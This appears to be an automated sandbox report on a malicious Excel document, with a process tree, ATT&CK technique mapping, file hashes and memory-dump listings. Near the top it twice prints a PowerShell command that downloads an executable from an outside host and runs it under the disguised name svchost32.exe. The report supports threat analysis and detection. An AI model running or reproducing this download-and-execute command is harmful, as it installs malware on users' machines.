- Suspicious use of WriteProcessMemory
PID:3764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4928

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/39.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1968

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3292

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:808

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4480

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4532

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4352

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2148

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3960

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:224

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4392

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
42fb97c861fb0400877cf26cb6fb41f2

SHA1
4b858f26fa4e35e65509a25bee693eef5ea411a7

SHA256
b030f6da934b9ea1c5829c326e4991f7183c550263b3722ff9b61cfa238e8772

SHA512
2ccac738a44967413c4a0ad53fee4b6faffdcccf6091661fd9e0fb76c0500e24eccacd8d5d3ad26476bdbf6ee5be53f59d0949d282417dd21429a023ad05bbf7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
471B

MD5
b8c0f9edc69747692df1d72ef62a993e

SHA1
14b4069ff68209aa1f15b87a6e063118e0c9d92b

SHA256
a8a0ab8dad87e93e2c746556420b921f150388943fe45bab7f9c8ebb222be40b

SHA512
cbcf6286918ca3458be7038c74dca1c1cbe530e8f364f31da99a5c8b94bcdb642e295b0ed2525ae4098e4d3a2d8e704756f570fbf13b6927e31431dd0ad8acaf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
3a9f010cd3b9505e06391b99aba5166b

SHA1
b1db2e903d166850cc78fc4d2df5ad1c9df44c4b

SHA256
116cbdcf01447e8bed98d366b8b38dea525cadf232c1e140785e74f25413a8d6

SHA512
fca71f32db6d2178af22d323b09535999f6c7bd0354e29b38ae54366d13473f58e9a0776eaa49a1e36089ff6f65f1a114211f25218577508a7b81cd2173b2e2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
d39cd72e24c9d9ae0cb0b9ac9bd92a6b

SHA1
f6cf8828968d6947eb37b25a5f7c01ecaaab18c2

SHA256
11962789b75101b6404ab4603c07509c4b4320ce7c165f836bc069baf576768f

SHA512
d9b3fc7c189b2f6cd1e2312bdeeabefa23c961ed0d49d98ca0d8a3863c1030937b6427efb78881e4a301708e2a94153f0535b9db7352ca8f921ec2f1216dea38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FF7969E5-6978-4874-800A-FFC2484653E1

Filesize
170KB

MD5
532e4ac9a08728edfcbc675d42de9e52

SHA1
9b6f249175020bc4bea3b3dceb39c34e0559afe2

SHA256
803fe06920c5191542973db96a0286ba48cd8e2ae0d764829c0418b1d1156fbc

SHA512
cbf90703dbde70fc94a9ecf655234af6b328ea4f95fbc3e3644dfca9340f217ddebb4cce789936e1a99846a4a4855bfdaa7bd4bb3f8cb57df913708cbd60bfc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
321KB

MD5
2534f35e0d311114ad3060a2a8f573dc

SHA1
cef953080b9bebe63b56a0257473a7d8439bd219

SHA256
46da721f07cb55f0f62f6bac9e2b68198fcdc57cac5be0d4edf74db34a3958ad

SHA512
81316a937c13b28b5ac0e1a28218b542a35ce4a7e6e569157dd96231cbf57393a558256b82d1c829cd90b40700c3b72c25cb7793387078b1e18b97fccf569fb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
085ebd119f5fc6b8f63720fac1166ff5

SHA1
af066018aadec31b8e70a124a158736aca897306

SHA256
b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687

SHA512
adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
33eea2792b9fa42f418d9d609f692007

SHA1
48c3916a14ef2d9609ec4d2887a337b973cf8753

SHA256
8f7807c324626abc2d3504638958c148e2e3f3e212261f078940cf4c5f0c4fbb

SHA512
b2dbfcdf2599c38c966c5ebce714a5cd50e2f8b411555acf9f02b31b9c29b8ab53a9afa9d32bab87a06e08f8b2c7818d600773f659a058c8af81c50be7f09b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
81f7ddbfffbcb29fe5a543b3a1e438b8

SHA1
d16b194470fe1404be5d9037fe9bccce3677e58f

SHA256
df476fccec8b974e8f602f490220c3674c6c4babf5d8050db2f75e80ce09d076

SHA512
9a3b6dab440240cc4ce8c5ab7669cc4d14bdb3013da26760411f099c2a59f6daa42a860eec6c6033378a49355e54a50177b68825d8c912286be49976b22fa101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
b00f3f56c104c94e03cd2ad8452c14e7

SHA1
51b78e45015e0d9d62fbdf31b75a22535a107204

SHA256
ba2b669020334ff01a85bfc900ea4371ea557bd315f154875d9bdfdc16ae8b50

SHA512
93e1609be5bbb414c285f37432ce93294c3d1583ef46c7c6c570c122f0b166c34b0ad87de708005c8af97dee27923ba53395a34c2563cdadf3c0a708848b3525

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
bb5122013e9da21ebcd7cf8bbfd442d8

SHA1
137dc37b75c41a0edca25bc20dab16729c23d5f5

SHA256
fa311153c8e26e115ed889e986eabf2c6f96123d7a3a7f89102bfa89321342c3

SHA512
6582f6d15a31dcaecc6e6fee0ebb21b6d2278c4b2c1f80580172181d457c47a8be7edb0bc007c701c8a3adc391656ee166a77f49f575539f4f7e5188f5da8a0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
fd39de0268d6a6ad214a2bb8e7d04444

SHA1
8519ccaaf31ba572e6224e052bd555268e7c205d

SHA256
37a1920e52980869d54d3d8affc1a370e9cd947813e51cc4fec909c4ad61a827

SHA512
6afbdfa73e5a3e3c4e593ceef2e1f3940d2ec7a40900c5abbc8bf686889ff5b4d5193bef682e8932a750a79b735569779298868f586a6e271eba8670c7002f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
e1296dfe2cf3638c45f0ccfe213c538e

SHA1
39b2b2ee19a86f9ea0732dc42368a3fcb25862bf

SHA256
45a432329d74d9a88aa6173a3e9bc951b52a0fdc0bf3fa2ebeb6413ef3b627e4

SHA512
2e1973bbc0723a1fdf859e584b46716ca68c184c2cf4292cdf341697cf9edee1321f05dd807d070becafcaff6bbf18c1da6410e3176aea012c20bcd8f532de56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
6f60b13b199ae8351a59df13c18109d5

SHA1
954250bb3d7ac1e34da3434ad30b835ea4ec67d7

SHA256
668b5f3d8e37d0a65dda3e6c9df96c006e6e48640e95378214ded8776fd1030a

SHA512
25a730178a3829e31942e447866c5c26b7d43945149c1b2b82c880fe1aa784b7f2c7815d8b888f117e5e702f6e09c3ae46563b5bf349a4905d3b47970121538a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
3bffff68aa0f4c7c5e62178c0eae2ed7

SHA1
68e5584b0378d2324a11928bed9f15daf75bcc60

SHA256
35ce4dba51f6a2d9b24e5871cc7a4790da008818938d6f42ff0161b5df5b22cb

SHA512
f4e5375b2f3c6a691bf27f6cf7bd48fd6725e2d1c3cd3951287f5361bae689fb45ec3fa0c23190b1ce5ddbb6ad0517df87299fc6cffb402ea3fd1e7ee13b0b05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
271a117eb85324bc0884f8d59ae3ff53

SHA1
5379d4f8dac8fb8ead91133dd4593a6bffecaa3c

SHA256
36152d349ca45574559e1cd7c27363e3f74dc6ae44d28d40e4fbc7f3dea9942b

SHA512
4d6cf652062bc05b2955b971574a5f5049d8ac0c33723a7dcf7954856096ead2983f7ae6564e7ccfe4965d2d9bca806b57f05458f59168cb40e30e043a8a6ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
5aa45b7d3d34799e5ff0df1d9d7288fe

SHA1
9dd54998f74684d9eadd3982d729230b69d3c024

SHA256
fe5d4000b0a052c40bbae613c17171a4289955dd22736fcce0fe8f3fca26954b

SHA512
57e85e556c01c01e92621b706a2d06dc8aee24cb791f4ef2f8f98028a54b85cdadd445217b021a9466e0ea8ccd694578be9382c3fe9c532969be8ab4f005b612

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ef2cc3f123f1a8bb0097209f1696ed74

SHA1
9c205fc3880aa8e23ed8129c6b8ce2a1432358e2

SHA256
f26e460466fdc42dfedaccf63198b633defbd51f64179d5a222852f9169dc1e0

SHA512
953924ec95f792812fdc0bcf0da730f69b3f5b47c01294eac43582153f98e295fe0680c2b54e42f708e0181977fe9b2e4fceae5ab8895814838261320311c7f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f379f260c6ea6a9110ed51c89b88fba8

SHA1
d323518258406059b8f79e463e64ff4e63332671

SHA256
ac28e4cadc0af4d46b21189bb986fded2034ae5ff06eb743118ae85da7c048cd

SHA512
0ce72f38aeac62933bed311ba0e1ee71427f81fc03d6ad20519d42519e081595fb080d6a08c26d8cc28e0823291a809d178f49c4a1ad8d18c3135c4428ad287c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
02c50fc1ebc74bfa375c3aedde074109

SHA1
3c85e9001541d9d34f570ae68cb07167c34899e9

SHA256
08e2058836f4302353933ea1d27a950d237df9278f8ef92413f4d7f17008293b

SHA512
b9ac5846740e8e82fa6edbd9b4df030ae8d2a17839828211515e1eb89aface72bd08a99855200e5b0f84e9921a0fd8747fce0ac4cf39558719f34edc3fb2cfa5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f918f6f3678f8e62bd38af2e0a5e9bfc

SHA1
fc68a5e27dabe2a366f684da55d544b0e59af5da

SHA256
79a8498eb971d0fc1e949f0fa0f7ddcd68f456f98ae291d180f18f40c1a5fd78

SHA512
f03f2762092695cf6b748446a40e929c3006f2381ad0031625f3d44a1557b2462a0b1e4adb9454e5bede97da0fb41bed8d56602f0dfa16502662009978d2344e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
131e99eeee483ff6f0c976bf1070b35e

SHA1
ff204f678b554dccfea8b49c86dace0bc6bf6798

SHA256
4fb400c791bdaef104d01538fb5ce0748e31acdee240a0ba321e9a728865cf25

SHA512
43878addaa88d173ee622eba795ebbdf551a593d085ff3cbe7f9cd68d468df86663c3f09b857e6395d43ec3bf6e1fb1efa4145e2bc84318041b25862662ba0ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cacdefe2886bdea2db5b61cb2c8093f

SHA1
150ea18e6256147890b77f118d2f9eaf8907ad79

SHA256
593c85bd9f612cac621683d1199fc27deacd3950be3fd8634a669772228f80e1

SHA512
c0b532a8138834a1942b8d6bc5f99ec9feca8f6b06f719346b20aefb75a15baefc2959299cf5dba3dc79ae5038c85e56f97d95ceb70b150ce0a67a80a46429b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9e786c6cae0cdba55bafe0d3c1bc6cbd

SHA1
60025ba57eac1248dbff8f79822972461efaaa3c

SHA256
d08295d2ee282a5f9ff49fa948673e1d6c757e4f783e84b9ce17ebd92bbe4c6f

SHA512
189519eea712455f1ab5eed9ea29eac42ec2e212cdfe524f05cce91e9a7f9ab52d471e94fc2c37c391c86d69ae05392804e3cf958e65eee9cc5f701fa5acf5c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b3ea842f951385029194bd17ace611d

SHA1
ed332b9e354e5fd48ed308ad234cb33308791330

SHA256
6948f5dcfa59e5df406c88eea069b5bd21db58e968b0f028ee303558d69b9c59

SHA512
d8f4195c11e533a7c7d0f0ce312376ae420650975694d6c62b9b5a3e2b8448a7ac8179f286a459f5b9f261f27158fc367691b9a0dadef11f4f11fd8f23b5a58b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b05990a5fe5a6220aaf08f7f2bb407e9

SHA1
fa8f701d6c8cb9879eb3fa1492ea82bae9ff702b

SHA256
e3aec878ff223c645d1a9361812fb91458c4cf84692e555bff9946701664a531

SHA512
8301719373674532e06bf2c347ea89f3c80400ece0a41875e7c2e63b33de37f5dc741f1d60b56e269ff91f3306bf4e59f780e555fc1e599e86e987806a5b9e4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCD4968.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c0ozhuta.kxw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe

Filesize
114B

MD5
e89f75f918dbdcee28604d4e09dd71d7

SHA1
f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

SHA256
6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

SHA512
8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
a0e75322eaef1590ae848dfdf80ea51c

SHA1
8bb266f8ce6a7d9c658ecbf4a00371c374147611

SHA256
f1b6848e124b1eead1c5c33d3a383bcacd485d54b70eae0d64441804fb818bcf

SHA512
ede325185a8fe500bc2b66ac73c2045ea060a7b4b38b4256ed0d6839327a3a2372329a3f00e9d0476a624f13c76331bd0a95997d34dd4e75f4c8b87b74058322

Download Submit
memory/1368-111-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/1368-27-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/1368-113-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/1368-109-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/1368-110-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/1368-108-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/1368-25-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/1368-29-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/1368-30-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/1368-28-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-7-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-14-0x00007FFF370E0000-0x00007FFF370F0000-memory.dmp

Filesize
64KB

Download
memory/2640-745-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-15-0x00007FFF370E0000-0x00007FFF370F0000-memory.dmp

Filesize
64KB

Download
memory/2640-5-0x00007FFF7976D000-0x00007FFF7976E000-memory.dmp

Filesize
4KB

Download
memory/2640-0-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/2640-8-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-11-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-13-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-212-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-12-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-9-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-10-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-6-0x00007FFF796D0000-0x00007FFF798C5000-memory.dmp

Filesize
2.0MB

Download
memory/2640-3-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/2640-4-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/2640-1-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/2640-2-0x00007FFF39750000-0x00007FFF39760000-memory.dmp

Filesize
64KB

Download
memory/3600-49-0x0000017FA6780000-0x0000017FA67A2000-memory.dmp

Filesize
136KB

Download